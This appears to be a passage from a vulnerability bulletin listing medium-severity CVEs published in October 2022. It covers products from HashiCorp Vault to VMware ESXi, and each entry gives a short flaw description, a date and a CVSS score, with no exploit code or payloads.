hashicorp — vault	HashiCorp Vault and Vault Enterprise’s TLS certificate auth method did not initially load the optionally configured CRL issued by the role’s CA into memory on startup, resulting in the revocation list not being checked if the CRL has not yet been retrieved. Fixed in 1.12.0, 1.11.4, 1.10.7, and 1.9.10.	2022-10-12	5.3	CVE-2022-41316 MISC MISC
haskell — aeson	The aeson library is not safe to use to consume untrusted JSON input. A remote user could abuse this flaw to produce a hash collision in the underlying unordered-containers library by sending specially crafted JSON data, resulting in a denial of service.	2022-10-10	6.5	CVE-2022-3433 MISC
human_resource_management_system_project — human_resource_management_system	A vulnerability was found in SourceCodester Human Resource Management System. It has been classified as critical. Affected is an unknown function of the file getstatecity.php. The manipulation of the argument sc leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-210714 is the identifier assigned to this vulnerability.	2022-10-13	6.5	CVE-2022-3470 MISC MISC
human_resource_management_system_project — human_resource_management_system	A vulnerability classified as critical has been found in SourceCodester Human Resource Management System. This affects an unknown part of the file getstatecity.php. The manipulation of the argument ci leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-210717 was assigned to this vulnerability.	2022-10-13	6.5	CVE-2022-3473 MISC MISC
human_resource_management_system_project — human_resource_management_system	A vulnerability, which was classified as problematic, has been found in SourceCodester Human Resource Management System 1.0. This issue affects some unknown processing of the component Add Employee Handler. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-210773 was assigned to this vulnerability.	2022-10-13	5.4	CVE-2022-3493 MISC
human_resource_management_system_project — human_resource_management_system	A vulnerability was found in SourceCodester Human Resource Management System 1.0. It has been classified as problematic. Affected is an unknown function of the component Master List. The manipulation of the argument city/state/country/position leads to cross site scripting. It is possible to launch the attack remotely. VDB-210786 is the identifier assigned to this vulnerability.	2022-10-14	5.4	CVE-2022-3497 MISC
human_resource_management_system_project — human_resource_management_system	A vulnerability was found in Human Resource Management System 1.0. It has been classified as problematic. This affects an unknown part of the component Leave Handler. The manipulation of the argument Reason leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-210831.	2022-10-14	5.4	CVE-2022-3502 MISC MISC
human_resource_management_system_project — human_resource_management_system	A vulnerability was found in SourceCodester Human Resource Management System. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file city.php. The manipulation of the argument searccity leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-210715.	2022-10-13	4.9	CVE-2022-3471 MISC MISC
human_resource_management_system_project — human_resource_management_system	A vulnerability was found in SourceCodester Human Resource Management System. It has been rated as critical. Affected by this issue is some unknown functionality of the file city.php. The manipulation of the argument cityedit leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210716.	2022-10-13	4.9	CVE-2022-3472 MISC MISC
ibm — navigator_mobile	IBM Navigator Mobile Android 3.4.1.1 and 3.4.1.2 app could allow a local user to obtain sensitive information due to improper access control. IBM X-Force ID: 233968.	2022-10-11	5.5	CVE-2022-38388 CONFIRM XF
ibm — sterling_partner_engagement_manager	IBM Sterling Partner Engagement Manager 2.0 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 229704.	2022-10-10	6.5	CVE-2022-34334 CONFIRM XF
ikus-soft — rdiffweb	Open Redirect in GitHub repository ikus060/rdiffweb prior to 2.5.0a4.	2022-10-10	6.1	CVE-2022-3438 CONFIRM MISC
isc — dhcp	In ISC DHCP 1.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1 a system with access to a DHCP server, sending DHCP packets crafted to include fqdn labels longer than 63 bytes, could eventually cause the server to run out of memory.	2022-10-07	6.5	CVE-2022-2929 CONFIRM MLIST FEDORA
jgraph — mxgraph	mxGraph v4.2.2 was discovered to contain a cross-site scripting (XSS) vulnerability via the setTooltips() function.	2022-10-12	6.1	CVE-2022-40440 MISC MISC MISC
johnsoncontrols — c-cure_9000_firmware	Under certain circumstances a CCURE Portal user could enumerate user accounts in CCURE 9000 version 2.90 and prior versions.	2022-10-11	5.3	CVE-2021-36201 CERT CONFIRM
johnsoncontrols — metasys_extended_application_and_data_server	On Metasys ADX Server version 12.0 running MVE, an Active Directory user could execute validated actions without providing a valid password when using MVE SMP UI.	2022-10-07	6.5	CVE-2022-21936 CERT CONFIRM
libreoffice — libreoffice	LibreOffice supports Office URI Schemes to enable browser integration of LibreOffice with MS SharePoint server. An additional scheme ‘vnd.libreoffice.command’ specific to LibreOffice was added. In the affected versions of LibreOffice links using that scheme could be constructed to call internal macros with arbitrary arguments. Which when clicked on, or activated by document events, could result in arbitrary script execution without warning. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.1; 7.3 versions prior to 7.3.6.	2022-10-11	6.3	CVE-2022-3140 MISC DEBIAN
liferay — liferay_portal	An insecure default in the component auth.login.prompt.enabled of Liferay Portal v7.0.0 through v7.4.2 allows attackers to enumerate usernames, site names, and pages.	2022-10-07	5.3	CVE-2022-41414 MISC
linux — linux_kernel	mm/rmap.c in the Linux kernel before 5.19.7 has a use-after-free related to leaf anon_vma double reuse.	2022-10-09	5.5	CVE-2022-42703 MISC MISC MISC MISC
linux — linux_kernel	A vulnerability classified as problematic has been found in Linux Kernel. This affects the function fib_nh_match of the file net/ipv4/fib_semantics.c of the component IPv4 Handler. The manipulation leads to out-of-bounds read. It is possible to initiate the attack remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-210357 was assigned to this vulnerability.	2022-10-08	4.3	CVE-2022-3435 N/A N/A FEDORA FEDORA
merchandise_online_store_project — merchandise_online_store	A Stored XSS issue in Merchandise Online Store v.1.0 allows to injection of Arbitrary JavaScript in edit account form.	2022-10-11	5.4	CVE-2022-42236 MISC
metaslider — slider,_gallery,_and_carousel	The Slider, Gallery, and Carousel by MetaSlider WordPress plugin before 3.27.9 does not sanitise and escape some of its Gallery Image parameters, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)	2022-10-10	4.8	CVE-2022-2823 MISC
metroui — metro_ui	Metro UI v4.4.0 to v4.5.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Javascript function.	2022-10-11	6.1	CVE-2022-41376 MISC
microsoft — azure_service_fabric	Service Fabric Explorer Spoofing Vulnerability.	2022-10-11	4.8	CVE-2022-35829 MISC
microsoft — edge_chromium	Microsoft Edge (Chromium-based) Spoofing Vulnerability.	2022-10-11	5.3	CVE-2022-41035 MISC
microsoft — office	Microsoft Office Spoofing Vulnerability.	2022-10-11	6.5	CVE-2022-38001 MISC
microsoft — office	Microsoft Office Information Disclosure Vulnerability.	2022-10-11	5.3	CVE-2022-41043 MISC
microsoft — storsimple_8010_firmware	StorSimple 8000 Series Elevation of Privilege Vulnerability.	2022-10-11	6.8	CVE-2022-38017 MISC
microsoft — windows_10	Windows NTLM Spoofing Vulnerability.	2022-10-11	6.5	CVE-2022-35770 MISC
microsoft — windows_10	Windows Mixed Reality Developer Tools Information Disclosure Vulnerability.	2022-10-11	6.5	CVE-2022-37974 MISC
microsoft — windows_10	Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability.	2022-10-11	6.5	CVE-2022-37977 MISC
microsoft — windows_10	Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability.	2022-10-11	5.9	CVE-2022-37965 MISC
microsoft — windows_10	Windows Graphics Component Information Disclosure Vulnerability.	2022-10-11	5.5	CVE-2022-37985 MISC
microsoft — windows_10	Windows Event Logging Service Denial of Service Vulnerability.	2022-10-11	4.3	CVE-2022-37981 MISC
microsoft — windows_server_2008	Windows Portable Device Enumerator Service Security Feature Bypass Vulnerability.	2022-10-11	6.8	CVE-2022-38032 MISC
microsoft — windows_server_2008	Windows Server Remotely Accessible Registry Keys Information Disclosure Vulnerability.	2022-10-11	6.5	CVE-2022-38033 MISC
microsoft — windows_server_2008	Windows DHCP Client Information Disclosure Vulnerability.	2022-10-11	5.5	CVE-2022-38026 MISC
microsoft — windows_server_2008	Windows Security Support Provider Interface Information Disclosure Vulnerability.	2022-10-11	5.3	CVE-2022-38043 MISC
microsoft — windows_server_2012	Windows Kernel Memory Information Disclosure Vulnerability.	2022-10-11	5.5	CVE-2022-37996 MISC
microsoft — windows_server_2019	Windows USB Serial Driver Information Disclosure Vulnerability.	2022-10-11	4.3	CVE-2022-38030 MISC
microsoft — windows_server_2022	Windows Distributed File System (DFS) Information Disclosure Vulnerability.	2022-10-11	5.5	CVE-2022-38025 MISC
misp-project — malware_information_sharing_platform	app/Controller/UsersController.php in MISP before 2.4.164 allows attackers to discover role names (this is information that only the site admin should have).	2022-10-10	4.3	CVE-2022-42724 MISC
octopus — octopus_server	In affected versions of Octopus Server it is possible to reveal information about teams via the API due to an Insecure Direct Object Reference (IDOR) vulnerability	2022-10-13	6.5	CVE-2022-2828 MISC
octopus — octopus_server	In affected versions of Octopus Server it was identified that when a sensitive value is a substring of another value, sensitive value masking will only partially work.	2022-10-12	5.3	CVE-2022-2720 MISC
online_birth_certificate_management_system_project — online_birth_certificate_management_system	Online Birth Certificate Management System version 1.0 suffers from a persistent Cross Site Scripting (XSS) vulnerability.	2022-10-14	5.4	CVE-2022-42069 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b5567.	2022-10-14	6.5	CVE-2022-35040 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b558f.	2022-10-14	6.5	CVE-2022-35041 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x4adb11.	2022-10-14	6.5	CVE-2022-35042 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6c08a6.	2022-10-14	6.5	CVE-2022-35043 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x617087.	2022-10-14	6.5	CVE-2022-35044 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b0d63.	2022-10-14	6.5	CVE-2022-35045 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b0466.	2022-10-14	6.5	CVE-2022-35046 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b05aa.	2022-10-14	6.5	CVE-2022-35047 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b0b2c.	2022-10-14	6.5	CVE-2022-35048 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b03b5.	2022-10-14	6.5	CVE-2022-35049 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b04de.	2022-10-14	6.5	CVE-2022-35050 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b55af.	2022-10-14	6.5	CVE-2022-35051 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b84b1.	2022-10-14	6.5	CVE-2022-35052 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x61731f.	2022-10-14	6.5	CVE-2022-35053 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6171b2.	2022-10-14	6.5	CVE-2022-35054 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6c0473.	2022-10-14	6.5	CVE-2022-35055 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b0478.	2022-10-14	6.5	CVE-2022-35056 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b05ce.	2022-10-14	6.5	CVE-2022-35058 MISC MISC
otfcc_project — otfcc	OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6c0414.	2022-10-14	6.5	CVE-2022-35059 MISC MISC
pencidesign — soledad	The soledad WordPress theme before 8.2.5 does not sanitise the {id,datafilter[type],…} parameters in its penci_more_slist_post_ajax AJAX action, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.	2022-10-10	6.1	CVE-2022-3209 MISC
picuploader_project — picuploader	PicUploader v2.6.3 was discovered to contain cross-site scripting (XSS) vulnerability via the setStorageParams function in SettingController.php.	2022-10-07	6.1	CVE-2022-41442 MISC MISC
premium-themes — cryptocurrency_pricing_list_and_ticker	The Cryptocurrency Pricing list and Ticker WordPress plugin through 1.5 does not sanitise and escape the ccpw_setpage parameter before outputting it back in pages where its shortcode is embed, leading to a Reflected Cross-Site Scripting issue	2022-10-10	6.1	CVE-2021-25044 MISC
projectworlds — online_examination_system	Online Examination System version 1.0 suffers from a cross site scripting vulnerability via index.php.	2022-10-14	6.1	CVE-2022-42066 MISC MISC
puppycms — puppycms	A vulnerability classified as problematic has been found in puppyCMS up to 5.1. This affects an unknown part of the file /admin/settings.php. The manipulation of the argument site_name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-210699.	2022-10-12	6.1	CVE-2022-3464 N/A
purchase_order_management_system_project — purchase_order_management_system	A vulnerability was found in SourceCodester Purchase Order Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the component Supplier Handler. The manipulation of the argument Supplier Name/Address/Contact person/Contact leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210832.	2022-10-14	5.4	CVE-2022-3503 MISC MISC
resiot — iot_platform_and_lorawan_network_server	Multiple Cross Site Scripting (XSS) vulnerabilities in ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 via the form fields.	2022-10-13	5.4	CVE-2022-34021 MISC
resmush.it — resmush.it_image_optimizer	The reSmush.it WordPress plugin before 0.4.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when unfiltered_html is disallowed.	2022-10-10	4.8	CVE-2022-2448 MISC
rpcms — rpcms	RPCMS v3.0.2 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily change the password of any account.	2022-10-13	6.5	CVE-2022-41474 MISC
rpcms — rpcms	RPCMS v3.0.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Search function.	2022-10-13	6.1	CVE-2022-41473 MISC
samsung — account	Sensitive log information leakage vulnerability in Samsung Account prior to version 13.5.0 allows attackers to unauthorized logout.	2022-10-07	5.5	CVE-2022-39874 MISC
samsung — account	Intent redirection vulnerability in Samsung Account prior to version 13.5.01.3 allows attackers to access content providers without permission.	2022-10-07	4.7	CVE-2022-39863 MISC
samsung — account	Improper component protection vulnerability in Samsung Account prior to version 13.5.0 allows attackers to unauthorized logout.	2022-10-07	4.4	CVE-2022-39875 MISC
samsung — checkout	Improper access control vulnerability in Samsung Checkout prior to version 5.0.55.3 allows attackers to access sensitive information via implicit intent broadcast.	2022-10-07	5.5	CVE-2022-39878 MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens manipulated SolidWorks Drawing (.sldasm, CoreCadTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	5.5	CVE-2022-39807 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens manipulated Wavefront Object (.obj, ObjTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	5.5	CVE-2022-41166 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens manipulated CATIA5 Part (.catpart, CatiaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	5.5	CVE-2022-41169 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens manipulated CATIA4 Part (.model, CatiaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	5.5	CVE-2022-41171 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens manipulated AutoCAD (.dxf, TeighaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	5.5	CVE-2022-41173 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens manipulated Right Hemisphere Material (.rhm, rh.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	5.5	CVE-2022-41174 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens manipulated Enhanced Metafile (.emf, emf.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	5.5	CVE-2022-41176 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens manipulated Iges Part and Assembly (.igs, .iges, CoreCadTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	5.5	CVE-2022-41178 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens manipulated Portable Document Format (.pdf, PDFPublishing.dll) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	5.5	CVE-2022-41181 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens manipulated Parasolid Part and Assembly (.x_b, CoreCadTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	5.5	CVE-2022-41182 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens manipulated Windows Cursor File (.cur, ico.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	5.5	CVE-2022-41183 MISC MISC
sap — business_objects_business_intelligence_platform	Under certain conditions, BOE AdminTools/ BOE SDK allows an attacker to access information which would otherwise be restricted.	2022-10-11	6.5	CVE-2022-39015 MISC MISC
sap — businessobjects_business_intelligence	SAP BusinessObjects BI LaunchPad – versions 420, 430, is susceptible to script execution attack by an unauthenticated attacker due to improper sanitization of the user inputs while interacting on the network. On successful exploitation, an attacker can view or modify information causing a limited impact on confidentiality and integrity of the application.	2022-10-11	6.1	CVE-2022-39800 MISC MISC
sap — businessobjects_business_intelligence	SAP BusinessObjects Business Intelligence platform (Analysis for OLAP) – versions 420, 430, allows an authenticated attacker to send user-controlled inputs when OLAP connections are created and edited in the Central Management Console. On successful exploitation, there could be a limited impact on confidentiality and integrity of the application.	2022-10-11	5.4	CVE-2022-41206 MISC MISC
sap — businessobjects_business_intelligence	Under certain conditions, the application SAP BusinessObjects Business Intelligence Platform (Version Management System) exposes sensitive information to an actor over the network with high privileges that is not explicitly authorized to have access to that information, leading to a high impact on Confidentiality.	2022-10-11	4.9	CVE-2022-35296 MISC MISC
sap — customer_data_cloud	SAP Customer Data Cloud (Gigya mobile app for Android) – version 7.4, uses encryption method which lacks proper diffusion and does not hide the patterns well. This can lead to information disclosure. In certain scenarios, application might also be susceptible to replay attacks.	2022-10-11	5.2	CVE-2022-41209 MISC MISC
sap — customer_data_cloud	SAP Customer Data Cloud (Gigya mobile app for Android) – version 7.4, uses insecure random number generator program which makes it easy for the attacker to predict future random numbers. This can lead to information disclosure and modification of certain user settings.	2022-10-11	5.2	CVE-2022-41210 MISC MISC
sap — data_services	SAP Data Services Management allows an attacker to copy the data from a request and echoed into the application’s immediate response, it will lead to a Cross-Site Scripting vulnerability. The attacker would have to log in to the management console to perform such as an attack, only few of the pages are vulnerable in the DS management console.	2022-10-11	6.1	CVE-2022-35226 MISC MISC
sap — enable_now	The application SAP Enable Now does not sufficiently encode user-controlled inputs over the network before it is placed in the output being served to other users, thereby expanding the attack scope, resulting in Stored Cross-Site Scripting (XSS) vulnerability leading to limited impact on Confidentiality, Integrity and Availability.	2022-10-11	5.4	CVE-2022-35297 MISC MISC
shortpixel — enable_media_replace	The Enable Media Replace WordPress plugin before 4.0.0 does not ensure that renamed files are moved to the Upload folder, which could allow high privilege users such as admin to move them outside to the web root directory via a path traversal attack for example	2022-10-10	4.9	CVE-2022-2554 MISC
siemens — desigo_pxm30-1_firmware	A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), Desigo PXM40-1 (All versions < V02.20.126.11-41), Desigo PXM40.E (All versions < V02.20.126.11-41), Desigo PXM50-1 (All versions < V02.20.126.11-41), Desigo PXM50.E (All versions < V02.20.126.11-41), PXG3.W100-1 (All versions < V02.20.126.11-37), PXG3.W100-2 (All versions < V02.20.126.11-41), PXG3.W200-1 (All versions < V02.20.126.11-37), PXG3.W200-2 (All versions < V02.20.126.11-41). Endpoints of the “Operation” web application that interpret and execute Axon language queries allow file read access to the device file system with root privileges. By supplying specific I/O related Axon queries, a remote low-privileged attacker can read sensitive files on the device.	2022-10-11	5.7	CVE-2022-40177 MISC
siemens — desigo_pxm30-1_firmware	A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), Desigo PXM40-1 (All versions < V02.20.126.11-41), Desigo PXM40.E (All versions < V02.20.126.11-41), Desigo PXM50-1 (All versions < V02.20.126.11-41), Desigo PXM50.E (All versions < V02.20.126.11-41), PXG3.W100-1 (All versions < V02.20.126.11-37), PXG3.W100-2 (All versions < V02.20.126.11-41), PXG3.W200-1 (All versions < V02.20.126.11-37), PXG3.W200-2 (All versions < V02.20.126.11-41). Improper Neutralization of Input During Web Page Generation exists in the “Import Files“ functionality of the “Operation” web application, due to the missing validation of the titles of files included in the input package. By uploading a specifically crafted graphics package, a remote low-privileged attacker can execute arbitrary JavaScript code.	2022-10-11	5.4	CVE-2022-40178 MISC
siemens — desigo_pxm30-1_firmware	A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), Desigo PXM40-1 (All versions < V02.20.126.11-41), Desigo PXM40.E (All versions < V02.20.126.11-41), Desigo PXM50-1 (All versions < V02.20.126.11-41), Desigo PXM50.E (All versions < V02.20.126.11-41), PXG3.W100-1 (All versions < V02.20.126.11-37), PXG3.W100-2 (All versions < V02.20.126.11-41), PXG3.W200-1 (All versions < V02.20.126.11-37), PXG3.W200-2 (All versions < V02.20.126.11-41). A Cross-Site Request Forgery exists in the “Import Files“ functionality of the “Operation” web application due to the missing validation of anti-CSRF tokens or other origin checks. A remote unauthenticated attacker can upload and enable permanent arbitrary JavaScript code into the device just by convincing a victim to visit a specifically crafted webpage while logged-in to the device web application.	2022-10-11	5.3	CVE-2022-40180 MISC
siemens — logo!_8_bm_firmware	A vulnerability has been identified in LOGO! 8 BM (incl. SIPLUS variants) (All versions). Affected devices do not properly validate an offset value which can be defined in TCP packets when calling a method. This could allow an attacker to retrieve parts of the content of the memory.	2022-10-11	5.3	CVE-2022-36363 MISC
siemens — scalance_x200-4p_irt_firmware	A vulnerability has been identified in SCALANCE X200-4P IRT (All versions < V5.5.0), SCALANCE X201-3P IRT (All versions < V5.5.0), SCALANCE X201-3P IRT PRO (All versions < V5.5.0), SCALANCE X202-2IRT (All versions < V5.5.0), SCALANCE X202-2P IRT (All versions < V5.5.0), SCALANCE X202-2P IRT PRO (All versions < V5.5.0), SCALANCE X204-2 (All versions < V5.2.5), SCALANCE X204-2FM (All versions < V5.2.5), SCALANCE X204-2LD (All versions < V5.2.5), SCALANCE X204-2LD TS (All versions < V5.2.5), SCALANCE X204-2TS (All versions < V5.2.5), SCALANCE X204IRT (All versions < V5.5.0), SCALANCE X204IRT PRO (All versions < V5.5.0), SCALANCE X206-1 (All versions < V5.2.5), SCALANCE X206-1LD (All versions < V5.2.5), SCALANCE X208 (All versions < V5.2.5), SCALANCE X208PRO (All versions < V5.2.5), SCALANCE X212-2 (All versions < V5.2.5), SCALANCE X212-2LD (All versions < V5.2.5), SCALANCE X216 (All versions < V5.2.5), SCALANCE X224 (All versions < V5.2.5), SCALANCE XF201-3P IRT (All versions < V5.5.0), SCALANCE XF202-2P IRT (All versions < V5.5.0), SCALANCE XF204 (All versions < V5.2.5), SCALANCE XF204-2 (All versions < V5.2.5), SCALANCE XF204-2BA IRT (All versions < V5.5.0), SCALANCE XF204IRT (All versions < V5.5.0), SCALANCE XF206-1 (All versions < V5.2.5), SCALANCE XF208 (All versions < V5.2.5), SIPLUS NET SCALANCE X202-2P IRT (All versions < V5.5.0). There is a cross-site scripting vulnerability on the affected devices, that if used by a threat actor, it could result in session hijacking.	2022-10-11	6.1	CVE-2022-40631 MISC
simplefilelist — simple-file-list	The Simple File List WordPress plugin before 4.4.12 does not implement nonce checks, which could allow attackers to make a logged in admin create new page and change it’s content via a CSRF attack.	2022-10-10	6.5	CVE-2022-3208 MISC
simplefilelist — simple-file-list	The Simple File List WordPress plugin before 4.4.12 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)	2022-10-10	4.8	CVE-2022-3207 MISC
solarwinds — network_configuration_manager	An entity in Network Configuration Manager product is misconfigured and exposing password field to Solarwinds Information Service (SWIS). Exposed credentials are encrypted and require authenticated access with an NCM role.	2022-10-10	6.5	CVE-2021-35226 MISC
student_clearance_system_project — student_clearance_system	A Stored XSS issue in Student Clearance System v.1.0 allows the injection of arbitrary JavaScript in the Student registration form.	2022-10-11	5.4	CVE-2022-42235 MISC
swftools — swftools	SWFTools commit 772e55a2 was discovered to contain a heap-buffer overflow via png_load at /lib/png.c.	2022-10-13	5.5	CVE-2022-35080 MISC MISC
swftools — swftools	SWFTools commit 772e55a2 was discovered to contain a heap-buffer overflow via png_read_header at /src/png2swf.c.	2022-10-13	5.5	CVE-2022-35081 MISC MISC
taskbuilder — taskbuilder	The Taskbuilder WordPress plugin before 1.0.8 does not validate and sanitise task’s attachments, which could allow any authenticated user (such as subscriber) creating a task to perform Stored Cross-Site Scripting by attaching a malicious SVG file	2022-10-10	5.4	CVE-2022-3137 MISC
tenda — ac1206_firmware	Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot.	2022-10-12	6.5	CVE-2022-42077 MISC
tenda — ac1206_firmware	Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolRestoreSet.	2022-10-12	6.5	CVE-2022-42078 MISC
tenda — ax1803_firmware	Tenda AX1803 US_AX1803v2.0br_v1.0.0.1_2994_CN_ZGYD01_4 is vulnerable to Cross Site Request Forgery (CSRF) via function TendaAteMode.	2022-10-12	6.5	CVE-2022-42086 MISC
tenda — ax1803_firmware	Tenda AX1803 US_AX1803v2.0br_v1.0.0.1_2994_CN_ZGYD01_4 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot.	2022-10-12	6.5	CVE-2022-42087 MISC
tiny-csrf_project — tiny-csrf	tiny-csrf is a Node.js cross site request forgery (CSRF) protection middleware. In versions prior to 1.1.0 cookies were not encrypted and thus CSRF tokens were transmitted in the clear. This issue has been addressed in commit `8eead6d` and the patch with be included in version 1.1.0. Users are advised to upgrade. There are no known workarounds for this issue.	2022-10-07	6.5	CVE-2022-39287 CONFIRM MISC
totaljs — total.js	A cross-site scripting (XSS) vulnerability in TotalJS commit 8c2c8909 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website name text field under Main Settings.	2022-10-07	5.4	CVE-2022-41392 MISC MISC MISC
trendmicro — apex_one	A registry permissions vulnerability in the Trend Micro Apex One Data Loss Prevention (DLP) module could allow a local attacker with administrative credentials to bypass certain elements of the product’s anti-tampering mechanisms on affected installations. Please note: an attacker must first obtain administrative credentials on the target system in order to exploit this vulnerability.	2022-10-10	6.7	CVE-2022-41748 MISC
vanderbilt — redcap	A reflected XSS vulnerability exists in REDCap before 12.04.18 in the Alerts & Notifications upload feature. A crafted CSV file will, when uploaded, trigger arbitrary JavaScript code execution.	2022-10-12	6.1	CVE-2022-42715 MISC MISC MISC
vmware — esxi	VMware ESXi contains a null-pointer deference vulnerability. A malicious actor with privileges within the VMX process only, may create a denial of service condition on the host.	2022-10-07	6.5	CVE-2022-31681 MISC
